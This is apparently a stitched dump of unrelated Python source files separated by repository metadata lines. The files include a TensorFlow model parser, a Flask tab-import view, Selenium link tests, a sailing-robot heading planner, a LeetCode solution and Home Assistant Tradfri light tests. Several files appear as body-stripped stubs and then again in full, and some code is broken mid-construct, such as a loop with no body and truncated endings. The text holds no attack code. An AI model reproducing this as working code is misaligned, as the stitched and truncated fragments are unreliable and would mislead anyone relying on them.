image_count = len(all_image_paths) print (image_count) print (all_image_paths[:10]) label_names = sorted(item.name for item in data_root.glob('*/') if item.is_dir()) print (label_names[-10:]) label_to_index = dict((name, index) for index,name in enumerate(label_names)) all_image_labels = [label_to_index[pathlib.Path(path).parent.name] for path in all_image_paths] print (all_image_labels[:10]) ds = tf.data.Dataset.from_tensor_slices((all_image_paths, all_image_labels)) image_label_ds = ds.map(load_and_preprocess_from_path_label) print (image_label_ds) ds = image_label_ds.apply( tf.data.experimental.shuffle_and_repeat(buffer_size=image_count)) ds = ds.batch(16) # ds = ds.prefetch(buffer_size=AUTOTUNE) print (ds) import keras def dump_model(net, root="/tmp/tfmodels/"): os.makedirs(root, exist_ok=True) # resnet50_v1 = tf.keras.applications.ResNet50(weights=None) net.trainable = False net.save(os.path.join(root, "model.h5")) K.set_learning_phase(0) model = load_model(os.path.join(root, "model.h5")) print ("Model Output: ", model.outputs) frozen_graph = freeze_session(K.get_session(), output_names=[out.op.name for out in model.outputs]) tf.train.write_graph(frozen_graph, root, "model.pb", as_text=False) from tensorflow_parser import TFParser from tensorflow.python.framework import dtypes import mxnet as mx def test_tf_parser(): def _tf_shape_to_list(shp): return [1 if d.size < 0 else d.size for d in shp.dim] def _get_attr(buf): fields = ["s", "i", "f", "b", "type", "shape", "tensor", "func"] x = buf ret = [] # Treat an empty oneof value as an empty list. 
if not x.WhichOneof("value"): return ret if x.HasField("list"): for f in fields: if getattr(x.list, f): if f == "type": ret += [dtypes.as_dtype(x) for x in list(getattr(x.list, f))] else: ret += list(getattr(x.list, f)) else: for f in fields: if x.HasField(f): if f == "type": ret = dtypes.as_dtype(getattr(x, f)) else: ret = getattr(x, f) return ret def _parse_attr(attr_proto): """Convert a list of AttributeProto to a dict, with names as keys.""" attrs = {} for key, value in attr_proto.items(): attrs[key] = _get_attr(value) print (key, value, "---", attrs[key]) return attrs model_path = "/data/tfmodels/resnet50_v1_new/model.pb" parser = TFParser(model_path) graph = parser.parse() nodes = {} node_map = {} input_shapes = {} tf_ops = set() for i, node in enumerate(graph.node): node_map[node.name] = node.op if node.op == 'Const': val = node.attr['value'].tensor input_shapes[node.name] = _tf_shape_to_list(val.tensor_shape) # print (node.name, node.op, input_shapes[node.name]) elif node.op == 'Placeholder' or node.op == 'PlaceholderWithDefault': input_shapes[node.name] = _tf_shape_to_list(node.attr['shape'].shape) print (node.name, node.op, input_shapes[node.name]) nodes[node.name] = [mx.sym.var(node.name, shape=input_shapes[node.name])] else: # print (node.op) tf_ops.add(node.op) print (tf_ops) for node in graph.node: if __name__ == '__main__': utils.log_init() # net = keras.applications.resnet.ResNet50(weights='imagenet') # net = tf.keras.applications.ResNet50(weights='imagenet') # net = tf.keras.applications.InceptionV3(weights='imagenet') # net = keras.applications.InceptionV3(weights='imagenet') net = tf.keras.applications.MobileNet(weights='imagenet') # dump_model(net, "/data/tfmodels/resnet50_v1_new") # load_imagenet() test_tf_parser()
5,730
0
180
de000d216bcbdb7cd4f3bca92009dd2bf900cfcc
4,372
py
Python
guitarfan/controlers/admin/data.py
timgates42/GuitarFan
1a6d6bcc7708cbb214648e7f5657728f6c27c48a
[ "MIT" ]
48
2015-02-02T02:25:07.000Z
2022-03-11T12:39:39.000Z
guitarfan/controlers/admin/data.py
timgates42/GuitarFan
1a6d6bcc7708cbb214648e7f5657728f6c27c48a
[ "MIT" ]
2
2015-09-13T14:00:41.000Z
2021-08-04T16:28:25.000Z
guitarfan/controlers/admin/data.py
timgates42/GuitarFan
1a6d6bcc7708cbb214648e7f5657728f6c27c48a
[ "MIT" ]
16
2015-01-09T08:15:13.000Z
2020-06-20T11:07:49.000Z
#!/usr/bin/env python # -*- coding: utf-8 -*- import os import sys import shutil from uuid import uuid4 from flask import render_template, request, current_app, redirect, url_for, flash, Blueprint, jsonify from flask.ext.login import login_required from sqlalchemy import exists from guitarfan.extensions.flasksqlalchemy import db from guitarfan.utilities import oshelper from guitarfan.utilities import validator from guitarfan.models import * from forms.tab import * bp_admin_data = Blueprint('bp_admin_data', __name__, template_folder="../../templates/admin/tabs") @bp_admin_data.route('/admin/data/import', methods=['GET', 'POST']) @login_required
40.481481
127
0.527219
#!/usr/bin/env python # -*- coding: utf-8 -*- import os import sys import shutil from uuid import uuid4 from flask import render_template, request, current_app, redirect, url_for, flash, Blueprint, jsonify from flask.ext.login import login_required from sqlalchemy import exists from guitarfan.extensions.flasksqlalchemy import db from guitarfan.utilities import oshelper from guitarfan.utilities import validator from guitarfan.models import * from forms.tab import * bp_admin_data = Blueprint('bp_admin_data', __name__, template_folder="../../templates/admin/tabs") @bp_admin_data.route('/admin/data/import', methods=['GET', 'POST']) @login_required def data_import(): if request.method == 'GET': return render_template('data_import.html') elif request.method == 'POST': root_path = request.form['path'] if 'path' in request.form else '' result_info = { 'artists': 0, 'tabs': 0, 'errors': [] } # check path if root_path == '' or not os.path.isdir(root_path): return jsonify(result='failed', msg='invalid path') # valid folder names are '0-9', 'other', 'a', 'b', 'c'...'z' valid_letter = map(chr, range(97, 123)) + ['0-9', 'other'] ### Traverse first level folders - letters for letter_dir_name in os.listdir(root_path): letter_dir_path = os.path.join(root_path, letter_dir_name) if not os.path.isdir(letter_dir_path) or not letter_dir_name.lower() in valid_letter: continue ### Traverse second level folders - artists for artist_dir_name in os.listdir(letter_dir_path): artist_dir_path = os.path.join(letter_dir_path, artist_dir_name) if not os.path.isdir(artist_dir_path): continue # create artist if not exist or just fetch it artist = Artist.query.filter_by(name=artist_dir_name).first() if artist is None: artist = Artist(str(uuid4()), artist_dir_name, letter_dir_name, '', 1, 1) db.session.add(artist) result_info['artists'] += 1 ## Traverse third level folders - tabs for tab_dir_name in os.listdir(artist_dir_path): tab_dir_path = os.path.join(artist_dir_path, tab_dir_name) if not 
os.path.isdir(tab_dir_path): continue # import tab if not exists if not db.session.query(exists().where(Tab.title == tab_dir_name and Tab.artist_id == artist.id)).scalar(): tab = Tab(str(uuid4()), tab_dir_name, 1, artist.id, 1, 1, '', None) db.session.add(tab) result_info['tabs'] += 1 ### Traverse imgs files under tab folder for file_name in os.listdir(tab_dir_path): file_path = os.path.join(tab_dir_path, file_name) if not os.path.isfile(file_path): continue if not oshelper.get_extension(file_name) in current_app.config['TAB_FILE_ALLOWED_EXTENSIONS']: continue try: dest_path = os.path.join(oshelper.get_tabfile_upload_abspath(), tab.id) if not os.path.isdir(dest_path): os.mkdir(dest_path) shutil.copy(file_path, dest_path) tabfile = TabFile(str(uuid4()), tab.id, os.path.join(tab.id, file_name)) db.session.add(tabfile) except: e = sys.exc_info()[0] result_info['errors'].append({ 'artist': artist_dir_name, 'tab': tab_dir_name, 'file': file_name, 'error': e }) continue db.session.commit() return jsonify(result='success', msg=result_info)
3,692
0
22
1a6635e183b5e8541c98be0db7c6d9ba49118650
5,655
py
Python
tests/test_rest_of_website.py
total-impact/impactstory-tester
7a1ba294aca1ccb97d03ad5abb48505790926d27
[ "MIT" ]
1
2015-02-19T15:17:56.000Z
2015-02-19T15:17:56.000Z
tests/test_rest_of_website.py
ourresearch/impactstory-tester
7a1ba294aca1ccb97d03ad5abb48505790926d27
[ "MIT" ]
null
null
null
tests/test_rest_of_website.py
ourresearch/impactstory-tester
7a1ba294aca1ccb97d03ad5abb48505790926d27
[ "MIT" ]
1
2015-01-10T13:50:12.000Z
2015-01-10T13:50:12.000Z
import os, requests from selenium_test_case import SeleniumTestCase, slow, online, wd, host import tests from tests.pages import faq_page, about_page from nose.tools import assert_equals, raises
65
1,876
0.681874
import os, requests from selenium_test_case import SeleniumTestCase, slow, online, wd, host import tests from tests.pages import faq_page, about_page from nose.tools import assert_equals, raises class TestFAQ(SeleniumTestCase): def setUp(self): self.page = faq_page.FaqPage(self.wd, self.host) def test_title(self): self.page.get() assert_equals(self.page.title, "FAQ") def test_which_products(self): self.page.get() assert "The number of readers who have added the article to their libraries" in self.page.html def test_tos_anchor_link(self): self.wd.get(self.page.url + "#tos") self.page.wait_till_loaded() assert_equals(self.page.title, "FAQ") @slow @online def test_all_links(self): self.page.get() print self.page.links #expected = [u'http://localhost:5000/faq#tos', u'http://www.wikipedia.org/', u'http://feedback.impactstory.org/', u'http://citedin.org/', u'http://www.crossref.org/', u'http://sciencecard.org/', u'http://www.delicious.com/', u'http://article-level-metrics.plos.org/', u'http://youtube.com/', u'http://github.com/', u'http://altmetric.com/', u'http://www.mendeley.com/groups/586171/altmetrics/papers/', u'http://blog.impactstory.org/2012/03/01/18535014681/', u'http://vimeo.com/', u'http://www.citeulike.org/', u'http://www.mendeley.com/', u'http://blog.impactstory.org/', u'http://www.topsy.com/', u'http://www.slideshare.net/', u'http://sloan.org/', u'http://altmetrics.org/manifesto/', u'http://gradschool.unc.edu/programs/royster', u'http://www.scienceseeker.org/', u'http://creativecommons.org/licenses/by/2.0/', u'http://beyond-impact.org/', u'http://figshare.com/', u'http://twitter.com/#!/ImpactStory', u'http://readermeter.org/', u'http://www.altmetric.com/', u'http://localhost:5000/#cool', u'http://localhost:5000/#limitations', u'http://localhost:5000/faq', u'https://www.zotero.org/groups/impact_factor_problems/items', u'http://pubmed.gov/', u'http://localhost:5000/about', u'https://github.com/mhahnel/Total-Impact/contributors', u'http://www.soros.org/', 
u'http://arxiv.org/', u'http://nsf.gov/', u'https://github.com/total-impact', u'http://www.info.sciverse.com/scopus/about', u'http://localhost:5000/#meaning', u'http://www.plumanalytics.com/', u'http://twitter.com/#!/ImpactStory_now', u'http://eprints.rclis.org/8605/', u'http://localhost:5000/settings/profile', u'http://asis.org/Bulletin/Apr-13/AprMay13_Piwowar_Priem.html', u'http://dataone.org/', u'http://localhost:5000/signup/name', u'http://impactstory.org/', u'http://localhost:5000/', u'http://wordpress.com/', u'http://www.datadryad.org/', u'http://twitter.com/', u'http://www.plos.org/'] #assert_equals(self.page.links, expected) for url in self.page.links: print url r = requests.get(url, verify=False) # don't check SSL certificates assert_equals(r.status_code, 200) class TestAbout(SeleniumTestCase): def setUp(self): SeleniumTestCase.setUp(self) self.page = about_page.AboutPage(self.wd, self.host) def test_title(self): self.page.get() assert_equals(self.page.title, "About") def test_team_anchor_link(self): self.wd.get(self.page.url + "#team") assert_equals(self.page.title, "About") @slow @online def test_all_links(self): self.page.get() print self.page.links #expected = [u'http://www.zotero.org/', u'http://localhost:5000/faq#tos', u'http://feedback.impactstory.org/', u'http://beyond-impact.org/', u'http://twitter.com/#!/ImpactStory', u'http://blog.impactstory.org/2012/03/01/18535014681/', u'http://blog.impactstory.org/', u'http://jasonpriem.org/blog', u'http://blog.impactstory.org/2013/06/17/sloan/', u'http://sloan.org/', u'http://altmetrics.org/manifesto/', u'http://twitter.com/researchremix', u'http://nsf.gov/', u'http://creativecommons.org/licenses/by/2.0/', u'http://www.plosone.org/article/info:doi/10.1371/journal.pone.0000308', u'http://localhost:5000/about', u'http://blog.impactstory.org/2012/03/29/20131290500/', u'http://www.plosone.org/article/info:doi/10.1371/journal.pone.0018657', u'https://twitter.com/jasonpriem/status/25844968813', 
u'http://jasonpriem.org/cv/#invited', u'http://blog.impactstory.org/2012/06/08/24638498595/', u'http://localhost:5000/faq', u'http://www.soros.org/', u'http://en.wikipedia.org/wiki/Radical_transparency', u'http://researchremix.wordpress.com/2010/10/12/journalpolicyproposal', u'http://localhost:5000/settings/profile', u'https://github.com/total-impact', u'http://localhost:5000/altmetrics.org/altmetrics12', u'http://twitter.com/#!/ImpactStory_now', u'http://researchremix.wordpress.com/', u'http://jasonpriem.org/cv/#refereed', u'http://asis.org/Bulletin/Apr-13/AprMay13_Piwowar_Priem.html', u'http://feedvis.com/', u'http://localhost:5000/signup/name', u'http://www.slideshare.net/hpiwowar', u'http://localhost:5000/', u'https://twitter.com/#!/jasonpriem', u'https://peerj.com/preprints/1/'] #assert_equals(self.page.links, expected) for url in self.page.links: print url r = requests.get(url, verify=False) # don't check SSL certificates assert_equals(r.status_code, 200) class TestFeedback(SeleniumTestCase): def setUp(self): SeleniumTestCase.setUp(self) self.url = "http://feedback.impactstory.org" def test_title(self): self.wd.get(self.url) title = self.wd.find_element_by_tag_name("h1").text expected = "General" assert_equals(title, expected)
4,976
335
132
d34a269d477cde58129f95111e3bfe221e6fa472
2,275
py
Python
USV_V1/applications/sailing_robot_control/src/sailing_robot/src/sailing_robot/heading_planning_station_keeping.py
supcon-nzic/-
52c97759f97f3222ca5465a5745842cfeb7f26a1
[ "Apache-2.0" ]
2
2020-07-16T03:15:10.000Z
2020-09-02T09:06:36.000Z
USV_V1/applications/sailing_robot_control/src/sailing_robot/src/sailing_robot/heading_planning_station_keeping.py
supcon-nzic/-
52c97759f97f3222ca5465a5745842cfeb7f26a1
[ "Apache-2.0" ]
null
null
null
USV_V1/applications/sailing_robot_control/src/sailing_robot/src/sailing_robot/heading_planning_station_keeping.py
supcon-nzic/-
52c97759f97f3222ca5465a5745842cfeb7f26a1
[ "Apache-2.0" ]
1
2021-01-20T12:47:14.000Z
2021-01-20T12:47:14.000Z
import heading_planning_laylines import json import make_ros_tasks
48.404255
115
0.64967
import heading_planning_laylines import json import make_ros_tasks class HeadingPlan(heading_planning_laylines.HeadingPlan): def __init__(self, *args, **kwargs): super(HeadingPlan, self).__init__(*args, **kwargs) self.debug_topics.extend( [('dbg_ball_position', 'String'), ('dbg_relative_position_list_len', 'Int16'), ('dbg_keeping', 'Bool'), ('dbg_keep_station_waypoint', 'String'), ]) self.station_keeping = None self.taskdict = { 'target_radius': self.target_radius, 'tack_voting_radius': self.tack_voting_radius, 'tasks': [{'kind': 'keep_station_three_point'}, ] } def calculate_state_and_goal(self): self.debug_pub('dbg_keeping', self.station_keeping is not None) self.debug_pub('dbg_relative_position_list_len', len(self.nav.relative_position_list)) if len(self.nav.relative_position_list) > 0: self.nav.calculate_ball_position() if self.nav.ball_position.distance(self.waypoint) < 10: self.debug_pub('dbg_ball_position', json.dumps( [self.nav.ball_position.lat.decimal_degree, self.nav.ball_position.lon.decimal_degree])) self.update_waypoint(self.nav.ball_position) if self.station_keeping is not None: self.station_keeping.update_waypoint(self.nav.ball_position) if self.station_keeping is None: dwp, hwp = self.nav.distance_and_heading(self.waypoint_xy) if dwp < self.target_radius: self.taskdict['tasks'][0].update({ 'waypoint': (self.waypoint.lat.decimal_degree, self.waypoint.lon.decimal_degree) }) self.station_keeping = \ make_ros_tasks.make_ros_tasks(self.taskdict, self.nav, self.name + '/station_keeping')[0] self.station_keeping.debug_pub = self.debug_pub return super(HeadingPlan, self).calculate_state_and_goal() else: return self.station_keeping.calculate_state_and_goal() def check_end_condition(self): """Are we there yet?""" return self.station_keeping is not None and self.station_keeping.check_end_condition()
1,932
252
23
c6524458859680d0d69f3723d59cb8ecc7c64fa7
205
py
Python
src/reverseWords/rev.py
rajitbanerjee/leetcode
720fcdd88d371e2d6592ceec8370a6760a77bb89
[ "CC0-1.0" ]
null
null
null
src/reverseWords/rev.py
rajitbanerjee/leetcode
720fcdd88d371e2d6592ceec8370a6760a77bb89
[ "CC0-1.0" ]
null
null
null
src/reverseWords/rev.py
rajitbanerjee/leetcode
720fcdd88d371e2d6592ceec8370a6760a77bb89
[ "CC0-1.0" ]
1
2021-04-28T18:17:55.000Z
2021-04-28T18:17:55.000Z
if __name__ == '__main__': s = input("Input: ") print(f"Output: {Solution().reverseWords(s)}")
22.777778
50
0.57561
class Solution: def reverseWords(self, s: str) -> str: return " ".join(s.split()[::-1]) if __name__ == '__main__': s = input("Input: ") print(f"Output: {Solution().reverseWords(s)}")
58
-6
48
4c691f66af872c1b99704980dafd3d5978718ed7
12,750
py
Python
tests/components/tradfri/test_light.py
petewill/home-assistant
5859dba4344f05fb8774aa1207e47ac28f627a67
[ "Apache-2.0" ]
3
2020-05-18T10:18:16.000Z
2020-12-08T11:27:55.000Z
tests/components/tradfri/test_light.py
petewill/home-assistant
5859dba4344f05fb8774aa1207e47ac28f627a67
[ "Apache-2.0" ]
19
2020-01-29T23:21:07.000Z
2021-07-23T23:26:51.000Z
tests/components/tradfri/test_light.py
petewill/home-assistant
5859dba4344f05fb8774aa1207e47ac28f627a67
[ "Apache-2.0" ]
6
2020-04-10T06:21:11.000Z
2021-07-01T08:53:38.000Z
"""Tradfri lights platform tests.""" from copy import deepcopy from unittest.mock import Mock, MagicMock, patch, PropertyMock import pytest from pytradfri.device import Device from pytradfri.device.light import Light from pytradfri.device.light_control import LightControl from homeassistant.components import tradfri from tests.common import MockConfigEntry DEFAULT_TEST_FEATURES = { "can_set_dimmer": False, "can_set_color": False, "can_set_temp": False, } # [ # {bulb features}, # {turn_on arguments}, # {expected result} # ] TURN_ON_TEST_CASES = [ # Turn On [{}, {}, {"state": "on"}], # Brightness > 0 [{"can_set_dimmer": True}, {"brightness": 100}, {"state": "on", "brightness": 100}], # Brightness == 1 [{"can_set_dimmer": True}, {"brightness": 1}, {"brightness": 1}], # Brightness > 254 [{"can_set_dimmer": True}, {"brightness": 1000}, {"brightness": 254}], # color_temp [{"can_set_temp": True}, {"color_temp": 250}, {"color_temp": 250}], # color_temp < 250 [{"can_set_temp": True}, {"color_temp": 1}, {"color_temp": 250}], # color_temp > 454 [{"can_set_temp": True}, {"color_temp": 1000}, {"color_temp": 454}], # hs color [ {"can_set_color": True}, {"hs_color": [300, 100]}, {"state": "on", "hs_color": [300, 100]}, ], # ct + brightness [ {"can_set_dimmer": True, "can_set_temp": True}, {"color_temp": 250, "brightness": 200}, {"state": "on", "color_temp": 250, "brightness": 200}, ], # ct + brightness (no temp support) [ {"can_set_dimmer": True, "can_set_temp": False, "can_set_color": True}, {"color_temp": 250, "brightness": 200}, {"state": "on", "hs_color": [26.807, 34.869], "brightness": 200}, ], # ct + brightness (no temp or color support) [ {"can_set_dimmer": True, "can_set_temp": False, "can_set_color": False}, {"color_temp": 250, "brightness": 200}, {"state": "on", "brightness": 200}, ], # hs + brightness [ {"can_set_dimmer": True, "can_set_color": True}, {"hs_color": [300, 100], "brightness": 200}, {"state": "on", "hs_color": [300, 100], "brightness": 200}, ], ] # Result 
of transition is not tested, but data is passed to turn on service. TRANSITION_CASES_FOR_TESTS = [None, 0, 1] @pytest.fixture(autouse=True, scope="module") def setup(request): """Set up patches for pytradfri methods.""" p_1 = patch( "pytradfri.device.LightControl.raw", new_callable=PropertyMock, return_value=[{"mock": "mock"}], ) p_2 = patch("pytradfri.device.LightControl.lights") p_1.start() p_2.start() def teardown(): """Remove patches for pytradfri methods.""" p_1.stop() p_2.stop() request.addfinalizer(teardown) @pytest.fixture def mock_gateway(): """Mock a Tradfri gateway.""" def get_devices(): """Return mock devices.""" return gateway.mock_devices def get_groups(): """Return mock groups.""" return gateway.mock_groups gateway = Mock( get_devices=get_devices, get_groups=get_groups, mock_devices=[], mock_groups=[], mock_responses=[], ) return gateway @pytest.fixture def mock_api(mock_gateway): """Mock api.""" async def api(command): """Mock api function.""" # Store the data for "real" command objects. 
if hasattr(command, "_data") and not isinstance(command, Mock): mock_gateway.mock_responses.append(command._data) return command return api async def generate_psk(self, code): """Mock psk.""" return "mock" async def setup_gateway(hass, mock_gateway, mock_api): """Load the Tradfri platform with a mock gateway.""" entry = MockConfigEntry( domain=tradfri.DOMAIN, data={ "host": "mock-host", "identity": "mock-identity", "key": "mock-key", "import_groups": True, "gateway_id": "mock-gateway-id", }, ) hass.data[tradfri.KEY_GATEWAY] = {entry.entry_id: mock_gateway} hass.data[tradfri.KEY_API] = {entry.entry_id: mock_api} await hass.config_entries.async_forward_entry_setup(entry, "light") def mock_light(test_features={}, test_state={}, n=0): """Mock a tradfri light.""" mock_light_data = Mock(**test_state) mock_light = Mock( id="mock-light-id-{}".format(n), reachable=True, observe=Mock(), device_info=MagicMock(), ) mock_light.name = "tradfri_light_{}".format(n) # Set supported features for the light. features = {**DEFAULT_TEST_FEATURES, **test_features} lc = LightControl(mock_light) for k, v in features.items(): setattr(lc, k, v) # Store the initial state. 
setattr(lc, "lights", [mock_light_data]) mock_light.light_control = lc return mock_light async def test_light(hass, mock_gateway, mock_api): """Test that lights are correctly added.""" features = {"can_set_dimmer": True, "can_set_color": True, "can_set_temp": True} state = { "state": True, "dimmer": 100, "color_temp": 250, "hsb_xy_color": (100, 100, 100, 100, 100), } mock_gateway.mock_devices.append( mock_light(test_features=features, test_state=state) ) await setup_gateway(hass, mock_gateway, mock_api) lamp_1 = hass.states.get("light.tradfri_light_0") assert lamp_1 is not None assert lamp_1.state == "on" assert lamp_1.attributes["brightness"] == 100 assert lamp_1.attributes["hs_color"] == (0.549, 0.153) async def test_light_observed(hass, mock_gateway, mock_api): """Test that lights are correctly observed.""" light = mock_light() mock_gateway.mock_devices.append(light) await setup_gateway(hass, mock_gateway, mock_api) assert len(light.observe.mock_calls) > 0 async def test_light_available(hass, mock_gateway, mock_api): """Test light available property.""" light = mock_light({"state": True}, n=1) light.reachable = True light2 = mock_light({"state": True}, n=2) light2.reachable = False mock_gateway.mock_devices.append(light) mock_gateway.mock_devices.append(light2) await setup_gateway(hass, mock_gateway, mock_api) assert hass.states.get("light.tradfri_light_1").state == "on" assert hass.states.get("light.tradfri_light_2").state == "unavailable" # Combine TURN_ON_TEST_CASES and TRANSITION_CASES_FOR_TESTS ALL_TURN_ON_TEST_CASES = [["test_features", "test_data", "expected_result", "id"], []] idx = 1 for tc in TURN_ON_TEST_CASES: for trans in TRANSITION_CASES_FOR_TESTS: case = deepcopy(tc) if trans is not None: case[1]["transition"] = trans case.append(idx) idx = idx + 1 ALL_TURN_ON_TEST_CASES[1].append(case) @pytest.mark.parametrize(*ALL_TURN_ON_TEST_CASES) async def test_turn_on( hass, mock_gateway, mock_api, test_features, test_data, expected_result, id ): """Test 
turning on a light.""" # Note pytradfri style, not hass. Values not really important. initial_state = { "state": False, "dimmer": 0, "color_temp": 250, "hsb_xy_color": (100, 100, 100, 100, 100), } # Setup the gateway with a mock light. light = mock_light(test_features=test_features, test_state=initial_state, n=id) mock_gateway.mock_devices.append(light) await setup_gateway(hass, mock_gateway, mock_api) # Use the turn_on service call to change the light state. await hass.services.async_call( "light", "turn_on", {"entity_id": "light.tradfri_light_{}".format(id), **test_data}, blocking=True, ) await hass.async_block_till_done() # Check that the light is observed. mock_func = light.observe assert len(mock_func.mock_calls) > 0 _, callkwargs = mock_func.call_args assert "callback" in callkwargs # Callback function to refresh light state. cb = callkwargs["callback"] responses = mock_gateway.mock_responses # State on command data. data = {"3311": [{"5850": 1}]} # Add data for all sent commands. for r in responses: data["3311"][0] = {**data["3311"][0], **r["3311"][0]} # Use the callback function to update the light state. dev = Device(data) light_data = Light(dev, 0) light.light_control.lights[0] = light_data cb(light) await hass.async_block_till_done() # Check that the state is correct. states = hass.states.get("light.tradfri_light_{}".format(id)) for k, v in expected_result.items(): if k == "state": assert states.state == v else: # Allow some rounding error in color conversions. assert states.attributes[k] == pytest.approx(v, abs=0.01) async def test_turn_off(hass, mock_gateway, mock_api): """Test turning off a light.""" state = {"state": True, "dimmer": 100} light = mock_light(test_state=state) mock_gateway.mock_devices.append(light) await setup_gateway(hass, mock_gateway, mock_api) # Use the turn_off service call to change the light state. 
await hass.services.async_call( "light", "turn_off", {"entity_id": "light.tradfri_light_0"}, blocking=True ) await hass.async_block_till_done() # Check that the light is observed. mock_func = light.observe assert len(mock_func.mock_calls) > 0 _, callkwargs = mock_func.call_args assert "callback" in callkwargs # Callback function to refresh light state. cb = callkwargs["callback"] responses = mock_gateway.mock_responses data = {"3311": [{}]} # Add data for all sent commands. for r in responses: data["3311"][0] = {**data["3311"][0], **r["3311"][0]} # Use the callback function to update the light state. dev = Device(data) light_data = Light(dev, 0) light.light_control.lights[0] = light_data cb(light) await hass.async_block_till_done() # Check that the state is correct. states = hass.states.get("light.tradfri_light_0") assert states.state == "off" def mock_group(test_state={}, n=0): """Mock a Tradfri group.""" default_state = {"state": False, "dimmer": 0} state = {**default_state, **test_state} mock_group = Mock(member_ids=[], observe=Mock(), **state) mock_group.name = "tradfri_group_{}".format(n) return mock_group async def test_group(hass, mock_gateway, mock_api): """Test that groups are correctly added.""" mock_gateway.mock_groups.append(mock_group()) state = {"state": True, "dimmer": 100} mock_gateway.mock_groups.append(mock_group(state, 1)) await setup_gateway(hass, mock_gateway, mock_api) group = hass.states.get("light.tradfri_group_0") assert group is not None assert group.state == "off" group = hass.states.get("light.tradfri_group_1") assert group is not None assert group.state == "on" assert group.attributes["brightness"] == 100 async def test_group_turn_on(hass, mock_gateway, mock_api): """Test turning on a group.""" group = mock_group() group2 = mock_group(n=1) group3 = mock_group(n=2) mock_gateway.mock_groups.append(group) mock_gateway.mock_groups.append(group2) mock_gateway.mock_groups.append(group3) await setup_gateway(hass, mock_gateway, mock_api) # Use 
the turn_off service call to change the light state. await hass.services.async_call( "light", "turn_on", {"entity_id": "light.tradfri_group_0"}, blocking=True ) await hass.services.async_call( "light", "turn_on", {"entity_id": "light.tradfri_group_1", "brightness": 100}, blocking=True, ) await hass.services.async_call( "light", "turn_on", {"entity_id": "light.tradfri_group_2", "brightness": 100, "transition": 1}, blocking=True, ) await hass.async_block_till_done() group.set_state.assert_called_with(1) group2.set_dimmer.assert_called_with(100) group3.set_dimmer.assert_called_with(100, transition_time=10) async def test_group_turn_off(hass, mock_gateway, mock_api): """Test turning off a group.""" group = mock_group({"state": True}) mock_gateway.mock_groups.append(group) await setup_gateway(hass, mock_gateway, mock_api) # Use the turn_off service call to change the light state. await hass.services.async_call( "light", "turn_off", {"entity_id": "light.tradfri_group_0"}, blocking=True ) await hass.async_block_till_done() group.set_state.assert_called_with(0)
30.871671
88
0.645569
"""Tradfri lights platform tests.""" from copy import deepcopy from unittest.mock import Mock, MagicMock, patch, PropertyMock import pytest from pytradfri.device import Device from pytradfri.device.light import Light from pytradfri.device.light_control import LightControl from homeassistant.components import tradfri from tests.common import MockConfigEntry DEFAULT_TEST_FEATURES = { "can_set_dimmer": False, "can_set_color": False, "can_set_temp": False, } # [ # {bulb features}, # {turn_on arguments}, # {expected result} # ] TURN_ON_TEST_CASES = [ # Turn On [{}, {}, {"state": "on"}], # Brightness > 0 [{"can_set_dimmer": True}, {"brightness": 100}, {"state": "on", "brightness": 100}], # Brightness == 1 [{"can_set_dimmer": True}, {"brightness": 1}, {"brightness": 1}], # Brightness > 254 [{"can_set_dimmer": True}, {"brightness": 1000}, {"brightness": 254}], # color_temp [{"can_set_temp": True}, {"color_temp": 250}, {"color_temp": 250}], # color_temp < 250 [{"can_set_temp": True}, {"color_temp": 1}, {"color_temp": 250}], # color_temp > 454 [{"can_set_temp": True}, {"color_temp": 1000}, {"color_temp": 454}], # hs color [ {"can_set_color": True}, {"hs_color": [300, 100]}, {"state": "on", "hs_color": [300, 100]}, ], # ct + brightness [ {"can_set_dimmer": True, "can_set_temp": True}, {"color_temp": 250, "brightness": 200}, {"state": "on", "color_temp": 250, "brightness": 200}, ], # ct + brightness (no temp support) [ {"can_set_dimmer": True, "can_set_temp": False, "can_set_color": True}, {"color_temp": 250, "brightness": 200}, {"state": "on", "hs_color": [26.807, 34.869], "brightness": 200}, ], # ct + brightness (no temp or color support) [ {"can_set_dimmer": True, "can_set_temp": False, "can_set_color": False}, {"color_temp": 250, "brightness": 200}, {"state": "on", "brightness": 200}, ], # hs + brightness [ {"can_set_dimmer": True, "can_set_color": True}, {"hs_color": [300, 100], "brightness": 200}, {"state": "on", "hs_color": [300, 100], "brightness": 200}, ], ] # Result 
of transition is not tested, but data is passed to turn on service. TRANSITION_CASES_FOR_TESTS = [None, 0, 1] @pytest.fixture(autouse=True, scope="module") def setup(request): """Set up patches for pytradfri methods.""" p_1 = patch( "pytradfri.device.LightControl.raw", new_callable=PropertyMock, return_value=[{"mock": "mock"}], ) p_2 = patch("pytradfri.device.LightControl.lights") p_1.start() p_2.start() def teardown(): """Remove patches for pytradfri methods.""" p_1.stop() p_2.stop() request.addfinalizer(teardown) @pytest.fixture def mock_gateway(): """Mock a Tradfri gateway.""" def get_devices(): """Return mock devices.""" return gateway.mock_devices def get_groups(): """Return mock groups.""" return gateway.mock_groups gateway = Mock( get_devices=get_devices, get_groups=get_groups, mock_devices=[], mock_groups=[], mock_responses=[], ) return gateway @pytest.fixture def mock_api(mock_gateway): """Mock api.""" async def api(command): """Mock api function.""" # Store the data for "real" command objects. 
if hasattr(command, "_data") and not isinstance(command, Mock): mock_gateway.mock_responses.append(command._data) return command return api async def generate_psk(self, code): """Mock psk.""" return "mock" async def setup_gateway(hass, mock_gateway, mock_api): """Load the Tradfri platform with a mock gateway.""" entry = MockConfigEntry( domain=tradfri.DOMAIN, data={ "host": "mock-host", "identity": "mock-identity", "key": "mock-key", "import_groups": True, "gateway_id": "mock-gateway-id", }, ) hass.data[tradfri.KEY_GATEWAY] = {entry.entry_id: mock_gateway} hass.data[tradfri.KEY_API] = {entry.entry_id: mock_api} await hass.config_entries.async_forward_entry_setup(entry, "light") def mock_light(test_features={}, test_state={}, n=0): """Mock a tradfri light.""" mock_light_data = Mock(**test_state) mock_light = Mock( id="mock-light-id-{}".format(n), reachable=True, observe=Mock(), device_info=MagicMock(), ) mock_light.name = "tradfri_light_{}".format(n) # Set supported features for the light. features = {**DEFAULT_TEST_FEATURES, **test_features} lc = LightControl(mock_light) for k, v in features.items(): setattr(lc, k, v) # Store the initial state. 
